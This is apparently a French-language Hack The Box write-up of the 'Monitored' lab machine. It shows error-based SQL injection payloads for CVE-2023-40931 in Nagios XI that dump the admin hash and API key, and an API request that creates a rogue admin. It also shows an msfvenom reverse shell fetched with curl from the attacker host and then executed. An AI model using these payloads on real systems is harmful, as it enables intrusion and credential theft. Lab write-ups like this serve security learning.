https://leopoldabgn.github.io/writeups/Recent content on sl0wguy's BlogHugo -- gohugo.ioen-usWed, 12 Nov 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/monitored-htb/Wed, 12 Nov 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/monitored-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Monitored cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Monitored</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.248</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">svc : XjH7VCehowpR1xZB </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap-tcp">nmap TCP </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.248 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.4p1 Debian 5+deb11u3 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> 61e2e7b41b5d46dc3b2f9138e66dc5ff <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 2973c5a58daa3f60a94aa3e59f675c93 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBbeArqg4dgxZEFQzd3zpod1RYGUH6Jfz6tcQjHsVTvRNnUzqx5nc7gK2kUUo1HxbEAH+cPziFjNJc6q7vvpzt4<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 6d7af9eb8e45c2026ad58d4db3a3376f <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB5o+WJqnyLpmJtLyPL+tEUTFbjMZkx3jUUFqejioAj7 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.56 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to https://nagios.monitored.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.56 <span class="o">(</span>Debian<span class="o">)</span> </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">63</span> OpenLDAP 2.2.X - 2.3.X </span></span><span class="line"><span class="cl">443/tcp open ssl/http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.56 <span class="o">((</span>Debian<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Nagios XI </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>nagios.monitored.htb/organizationName<span class="o">=</span>Monitored/stateOrProvinceName<span class="o">=</span>Dorset/countryName<span class="o">=</span>UK/emailAddress<span class="o">=</span>support@monitored.htb/localityName<span class="o">=</span>Bournemouth </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>nagios.monitored.htb/organizationName<span class="o">=</span>Monitored/stateOrProvinceName<span class="o">=</span>Dorset/countryName<span class="o">=</span>UK/emailAddress<span class="o">=</span>support@monitored.htb/localityName<span class="o">=</span>Bournemouth </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa10.10.11.248 </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">2048</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha256WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2023-11-11T21:46:55 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2297-08-25T21:46:55 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: b36a55607a5f047d983864504d67cfe0 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 610938448c36b08b0ae8a132971c8e89cfac2b5b </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIID/zCCAuegAwIBAgIUVhOvMcK6dv/Kvzplbf6IxOePX3EwDQYJKoZIhvcNAQEL </span></span><span class="line"><span class="cl"><span class="p">|</span> 4c8NpU/6egay1sl2ZrQuO8feYA<span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.56 <span class="o">(</span>Debian<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: TLS randomness does not represent <span class="nb">time</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> tls-alpn: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ http/1.1 </span></span><span class="line"><span class="cl">5667/tcp open tcpwrapped syn-ack ttl <span class="m">63</span> </span></span><span class="line"><span class="cl">No exact OS matches <span class="k">for</span> host <span class="o">(</span>If you know what OS is running on it, see https://nmap.org/submit/ <span class="o">)</span>. </span></span><span class="line"><span class="cl">TCP/IP fingerprint: </span></span><span class="line"><span class="cl">OS:SCAN<span class="o">(</span><span class="nv">V</span><span class="o">=</span>7.93%E<span class="o">=</span>4%D<span class="o">=</span>11/10%OT<span class="o">=</span>22%CT<span class="o">=</span>1%CU<span class="o">=</span>37179%PV<span class="o">=</span>Y%DS<span class="o">=</span>2%DC<span class="o">=</span>T%G<span class="o">=</span>Y%TM<span class="o">=</span><span class="m">691219</span> </span></span><span class="line"><span class="cl">OS:%RUCK<span class="o">=</span>G%RUD<span class="o">=</span>G<span class="o">)</span>IE<span class="o">(</span><span class="nv">R</span><span class="o">=</span>Y%DFI<span class="o">=</span>N%T<span class="o">=</span>40%CD<span class="o">=</span>S<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="snmp">SNMP </h3><p>Avec un scan nmap sur les ports <strong>UDP</strong>, on comprend que le port <strong>SNMP</strong> est ouvert. Avec <strong>nmap</strong>, on effectue plusieurs commandes SNMP et on trouve des credentials:</p> <ul> <li>svc / &ldquo;XjH7VCehowpR1xZB&rdquo;</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -vv --reason -Pn -T4 -sU -sV -p <span class="m">161</span> --script<span class="o">=</span><span class="s2">&#34;banner,(snmp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)&#34;</span> -oN <span class="s2">&#34;/opt/my-resources/setup/zsh/results/10.10.11.248/scans/udp161/udp_161_snmp-nmap.txt&#34;</span> -oX <span class="s2">&#34;/opt/my-resources/setup/zsh/results/10.10.11.248/scans/udp161/xml/udp_161_snmp_nmap.xml&#34;</span> 10.10.11.248 </span></span><span class="line"><span class="cl"><span class="p">|</span> 631: </span></span><span class="line"><span class="cl"><span class="p">|</span> Name: sh </span></span><span class="line"><span class="cl"><span class="p">|</span> Path: /bin/sh </span></span><span class="line"><span class="cl"><span class="p">|</span> Params: -c sleep 30<span class="p">;</span> sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB </span></span></code></pre></td></tr></table> </div> </div><h3 id="nagios-xi---cannot-login">Nagios XI - Cannot login </h3><p>Le user/pass ne fonctionne pas &ldquo;The specified user account has been disabled or does not exist.&rdquo;</p> <h3 id="sql-injection">SQL Injection </h3><p>En cherchant sur internet, on trouve la CVE suivante (que l&rsquo;on teste à l&rsquo;aveugle car on ne connait pas la version de Nagios XI qui est installée) : <strong>CVE-2023-40931</strong></p> <p>A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to <strong>/nagiosxi/admin/banner_message-ajaxhelper.php</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: nagios.monitored.htb </span></span><span class="line"><span class="cl">Cookie: <span class="nv">nagiosxi</span><span class="o">=</span>lmeogjafdeiommcbnhu1k7s9lh </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Ubuntu<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:144.0<span class="o">)</span> Gecko/20100101 Firefox/144.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: fr,fr-FR<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.3 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl">Te: trailers </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: <span class="m">204</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">action</span><span class="o">=</span>acknowledge_banner_message<span class="p">&amp;</span><span class="nv">token</span><span class="o">=</span>9f86697945abf56d35a7ee14233bef5b481a51be<span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span>3+OR+<span class="o">(</span>SELECT+7402+FROM<span class="o">(</span>SELECT+COUNT<span class="o">(</span>*<span class="o">)</span>,CONCAT<span class="o">(</span>@@version,FLOOR<span class="o">(</span>RAND<span class="o">(</span>0<span class="o">)</span>*2<span class="o">))</span>x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x<span class="o">)</span>a<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> &lt;p&gt;&lt;pre&gt;SQL Error <span class="o">[</span>nagiosxi<span class="o">]</span> : Duplicate entry <span class="s1">&#39;10.5.23-MariaDB-0+deb11u11&#39;</span> <span class="k">for</span> key <span class="s1">&#39;group_key&#39;</span>&lt;/pre&gt;&lt;/p&gt; </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;message&#34;</span>:<span class="s2">&#34;Failed to acknowledge message.&#34;</span>,<span class="s2">&#34;msg_type&#34;</span>:<span class="s2">&#34;error&#34;</span><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>On récupère le hachage Admin, que l&rsquo;on ne réussit pas à déchiffrer.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">action</span><span class="o">=</span>acknowledge_banner_message<span class="p">&amp;</span><span class="nv">token</span><span class="o">=</span>9f86697945abf56d35a7ee14233bef5b481a51be<span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span>3+OR+<span class="o">(</span>SELECT+7402+FROM<span class="o">(</span>SELECT+COUNT<span class="o">(</span>*<span class="o">)</span>,CONCAT<span class="o">((</span><span class="k">select</span>+username+from+xi_users+LIMIT+1<span class="o">)</span>,FLOOR<span class="o">(</span>RAND<span class="o">(</span>0<span class="o">)</span>*2<span class="o">))</span>x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x<span class="o">)</span>a<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&gt;&gt;&gt; SQL Error <span class="o">[</span>nagiosxi<span class="o">]</span> : Duplicate entry <span class="s1">&#39;nagiosadmin1&#39;</span> <span class="k">for</span> key <span class="s1">&#39;group_key&#39;</span> <span class="c1"># --&gt; nagiosadmin (le &#34;1&#34; est raouté par FLOOR(...))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">action</span><span class="o">=</span>acknowledge_banner_message<span class="p">&amp;</span><span class="nv">token</span><span class="o">=</span>9f86697945abf56d35a7ee14233bef5b481a51be<span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span>3+OR+<span class="o">(</span>SELECT+7402+FROM<span class="o">(</span>SELECT+COUNT<span class="o">(</span>*<span class="o">)</span>,CONCAT<span class="o">((</span><span class="k">select</span>+password+from+xi_users+LIMIT+1<span class="o">)</span>,FLOOR<span class="o">(</span>RAND<span class="o">(</span>0<span class="o">)</span>*2<span class="o">))</span>x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x<span class="o">)</span>a<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&gt;&gt;&gt; SQL Error <span class="o">[</span>nagiosxi<span class="o">]</span> : Duplicate entry <span class="s1">&#39;$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C1&#39;</span> <span class="k">for</span> key <span class="s1">&#39;group_key&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;ai tenté de bruteforce le hash mais ça n&rsquo;a pas fonctionné : j&rsquo;avais oublié que chaque résultat de requete SQL rajoutait un &ldquo;1&rdquo; à la fin&hellip; Donc mon hash était en vérité:</p> <blockquote> <p>$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C &lt;&mdash;- sans la 1 !! (Mais ça n&rsquo;a pas fonctionné de toute manière)</p> </blockquote> <p><code>xi_users</code> table:</p> <blockquote> <p>user_id, username, password, name, email, backend_ticket, enabled, api_key, api_enabled, login_attempts, last_attempt, last_password_change, last_login, last_edited, &hellip;</p> </blockquote> <p>J&rsquo;ai récupérer les colonnes de la table xi_users en utilisant ce type de requêtes :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="k">select</span> COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where <span class="nv">table_name</span><span class="o">=</span><span class="s1">&#39;xi_users&#39;</span> limit <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="k">select</span> COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where <span class="nv">table_name</span><span class="o">=</span><span class="s1">&#39;xi_users&#39;</span> limit 1,1 </span></span><span class="line"><span class="cl"><span class="k">select</span> COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where <span class="nv">table_name</span><span class="o">=</span><span class="s1">&#39;xi_users&#39;</span> limit 2,1 </span></span><span class="line"><span class="cl"><span class="k">select</span> COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where <span class="nv">table_name</span><span class="o">=</span><span class="s1">&#39;xi_users&#39;</span> limit 3,1 </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On réussi à récupérer la clé API de l&rsquo;administateur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># If you have &#34;...&#34; because your string is very long</span> </span></span><span class="line"><span class="cl"><span class="k">select</span> api_key from xi_users limit <span class="m">1</span> </span></span><span class="line"><span class="cl">&gt;&gt;&gt; <span class="s1">&#39;IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9C...&#39;</span> </span></span><span class="line"><span class="cl"><span class="c1"># You can use SUBSTRING multiple times to dump the string</span> </span></span><span class="line"><span class="cl"><span class="k">select</span> SUBSTRING<span class="o">(</span>api_key, 1, 10<span class="o">)</span> from xi_users limit <span class="m">1</span> </span></span></code></pre></td></tr></table> </div> </div><blockquote> <p>IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL</p> </blockquote> <p>En récupérant les requête API utilisé sur une autre exploit disponible (récente), j&rsquo;ai pu créer un nouvel utilisateur Administrateur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /nagiosxi/api/v1/system/user?apikey<span class="o">=</span>IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL<span class="p">&amp;</span><span class="nv">pretty</span><span class="o">=</span><span class="m">1</span> HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 10.10.11.248 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">username</span><span class="o">=</span>Lu6Wk<span class="p">&amp;</span><span class="nv">password</span><span class="o">=</span>DxMkC<span class="p">&amp;</span><span class="nv">name</span><span class="o">=</span>Lu6Wk<span class="p">&amp;</span><span class="nv">email</span><span class="o">=</span>Lu6Wk%40mail.com<span class="p">&amp;</span><span class="nv">auth_level</span><span class="o">=</span>admin </span></span></code></pre></td></tr></table> </div> </div><p>On peut alors ensuite se connecter sur l&rsquo;interface graphique de nagios XI avec ce nouvel utilisateur et créer des commandes sur cette page :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /nagiosxi/includes/components/ccm/index.php?cmd<span class="o">=</span>view<span class="p">&amp;</span><span class="nv">type</span><span class="o">=</span>command<span class="p">&amp;</span><span class="nv">page</span><span class="o">=</span><span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php?cmd<span class="o">=</span>modify<span class="p">&amp;</span><span class="nv">type</span><span class="o">=</span>command<span class="p">&amp;</span><span class="nv">id</span><span class="o">=</span>158<span class="p">&amp;</span><span class="nv">page</span><span class="o">=</span>1<span class="p">&amp;</span><span class="nv">returnUrl</span><span class="o">=</span>index.php%3Fcmd%3Dview%26type%3Dcommand%26page%3D1 </span></span><span class="line"><span class="cl">&gt;&gt;&gt; Command Line : cat user.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GET /nagiosxi/includes/components/nagioscorecfg/applyconfig.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GET /nagiosxi/includes/components/ccm/command_test.php?cmd<span class="o">=</span>test<span class="p">&amp;</span><span class="nv">mode</span><span class="o">=</span>test<span class="p">&amp;</span><span class="nv">cid</span><span class="o">=</span>158<span class="p">&amp;</span><span class="nv">nsp</span><span class="o">=</span>443df18d3ff18d83e02a7bb13fc42870f7b73046851cecd9e301897d427f8a5e HTTP/1.1 </span></span><span class="line"><span class="cl">Host: nagios.monitored.htb </span></span><span class="line"><span class="cl">User-Agent: python-requests/2.32.4 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: <span class="nv">nagiosxi</span><span class="o">=</span>8pi6o9q2kph72ugu230v9vjq2g </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">[</span>nagios@monitored ~<span class="o">]</span>$ cat user.txt </span></span><span class="line"><span class="cl">213b4331f50e5f1072d301938db28331 </span></span></code></pre></td></tr></table> </div> </div><h3 id="stable-shell">Stable Shell </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Reverse Shell Linux ELF</span> </span></span><span class="line"><span class="cl">$ msfvenom -p linux/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.14 <span class="nv">LPORT</span><span class="o">=</span><span class="m">1337</span> -f elf &gt; shell </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No platform was selected, choosing Msf::Module::Platform::Linux from the payload </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No arch selected, selecting arch: x64 from the payload </span></span><span class="line"><span class="cl">No encoder specified, outputting raw payload </span></span><span class="line"><span class="cl">Payload size: <span class="m">74</span> bytes </span></span><span class="line"><span class="cl">Final size of elf file: <span class="m">194</span> bytes </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ http-server <span class="m">80</span> </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">80</span> <span class="o">(</span>http://0.0.0.0:80/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.11.248 - - <span class="o">[</span>11/Nov/2025 19:58:51<span class="o">]</span> <span class="s2">&#34;GET /shell HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Through Burp, I executed <span class="m">3</span> commands in a row : </span></span><span class="line"><span class="cl">- curl http://10.10.14.14/shell -O shell </span></span><span class="line"><span class="cl">- chmod <span class="m">777</span> shell </span></span><span class="line"><span class="cl">- ./shell </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.248. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.248:53330. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">nagios@monitored:/home/nagios$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span 